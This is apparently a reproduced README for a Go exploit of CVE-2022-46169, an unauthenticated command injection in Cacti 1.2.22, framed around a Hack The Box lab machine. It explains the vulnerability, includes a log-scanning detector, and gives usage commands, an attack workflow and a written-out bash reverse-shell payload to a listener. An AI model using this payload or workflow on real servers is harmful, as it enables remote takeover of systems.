## https://sploitus.com/exploit?id=A8D758B5-CAE2-5AF1-9311-6695FB19CC90
# CVE-2022-46169 Proof-of-Concept Exploit
## Overview
This is a Proof-of-Concept (PoC) exploit for **CVE-2022-46169**, targeting a **Cacti 1.2.22 Remote Code Execution** vulnerability. The exploit was created for educational purposes and for authorized penetration testing only, specifically for the retired **MonitorsTwo** machine available on **Hack The Box**.
**⚠ Disclaimer: This code is provided for educational purposes only. The author is not responsible for any misuse. Unauthorized access or testing on systems without permission is illegal and may result in severe legal consequences.**
**USE AT YOUR OWN RISK.**
## Vulnerability Overview
This exploit targets a command injection vulnerability in Cacti versions <=1.2.22. The `remote_agent.php` endpoint does not properly require authentication: its access check can be bypassed by manipulating the `X-Forwarded-For` header. Once past that check, arbitrary commands can be executed via the `poller_id` parameter of the `polldata` action, which Cacti passes to `proc_open`. The issue has been addressed in versions >=1.2.23.
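A defender-side check for the request shape described above, as an added example that is not part of this PoC: it scans combined-format web access-log lines for `remote_agent.php?action=polldata` requests whose `poller_id` is not a plain integer, the form a command injection through that parameter has to take. The log lines, addresses and the `InjectionReason`/`ScanAccessLog` names are constructed for this example.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

var (
	logLine   = regexp.MustCompile(`^(\S+) .*?"[A-Z]+ (\S+) HTTP/`) // client IP, request target
	numericID = regexp.MustCompile(`^[0-9]+$`)
)

// InjectionReason is non-empty when a request target is remote_agent.php?action=polldata
// with a poller_id that is not a plain integer, the shape the injection described above
// takes before Cacti hands the value to proc_open. A legitimate poller passes an integer.
func InjectionReason(target string) string {
	u, err := url.Parse(target)
	if err != nil || !strings.HasSuffix(u.Path, "/remote_agent.php") {
		return ""
	}
	q := u.Query() // URL-decodes the value, so "1%3Btest" is inspected as "1;test"
	if pid := q.Get("poller_id"); q.Get("action") == "polldata" && pid != "" && !numericID.MatchString(pid) {
		return fmt.Sprintf("non-numeric poller_id %q", pid)
	}
	return ""
}

// ScanAccessLog runs InjectionReason over combined-format access-log lines and returns
// "client -> reason" strings keyed by 1-based line number.
func ScanAccessLog(logText string) map[int]string {
	hits := map[int]string{}
	for n, line := range strings.Split(strings.TrimSpace(logText), "\n") {
		if m := logLine.FindStringSubmatch(line); m != nil {
			if why := InjectionReason(m[2]); why != "" {
				hits[n+1] = m[1] + " -> " + why
			}
		}
	}
	return hits
}

// sampleLog is constructed for this example; addresses and timestamps are made up.
const sampleLog = `10.0.0.5 - - [10/Jan/2023:10:00:01 +0000] "GET /cacti/remote_agent.php?action=polldata&host_id=1&poller_id=1 HTTP/1.1" 200 2
10.0.0.5 - - [10/Jan/2023:10:00:02 +0000] "GET /cacti/remote_agent.php?action=polldata&host_id=1&poller_id=1%3Btest HTTP/1.1" 200 2
10.0.0.9 - - [10/Jan/2023:10:00:03 +0000] "GET /cacti/index.php HTTP/1.1" 200 512`
func main() {
	fmt.Println(ScanAccessLog(sampleLog)) // map[2:10.0.0.5 -> non-numeric poller_id "1;test"]
}
```

Only the second sample line is flagged; the bruteforce of `host_id` values that precedes the injection is not covered by this check and would need a per-client request count.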
## Usage
```bash
go run CVE-2022-46169.go [OPTIONS]
```
### Options:
- `-t`: Target Cacti URL (e.g., `http://<target>/cacti`)
- `-i`: Listen IP address for reverse shell
- `-p`: Listen port for reverse shell
- `-d`: (Optional) Enable debug logging
- `-x`: (Optional) Set an HTTP proxy (e.g., `http://127.0.0.1:8080`)
### Example:
```bash
go run CVE-2022-46169.go -t http://<target>/cacti -i 10.10.10.10 -p 9001
```
This command will generate and send the following reverse shell payload:
```bash
bash -c "bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"
```
## Workflow
1. **Target Confirmation**: Checks whether the target is running Cacti 1.2.22 by requesting the `/remote_agent.php` page.
2. **Bruteforce**: The exploit bruteforces valid `host_id` and `local_data_id` values.
3. **Exploit Execution**: Once valid IDs are found, the payload is encoded and sent to the target via a malicious HTTP request.
4. **Payload Execution**: If successful, the payload is executed on the target system, and a reverse shell connection is established.
## Debug Mode
Use the `-d` flag to enable verbose output for debugging. This mode will display additional information, such as request URLs and responses, to help troubleshoot any issues during execution.
```bash
go run CVE-2022-46169.go -t http://target/cacti -i 10.10.10.10 -p 9001 -d
```
## Using HTTP Proxy
Use the `-x` flag to send all requests through the given HTTP proxy.
```bash
go run CVE-2022-46169.go -t http://target/cacti -i 10.10.10.10 -p 9001 -x http://127.0.0.1:8080
```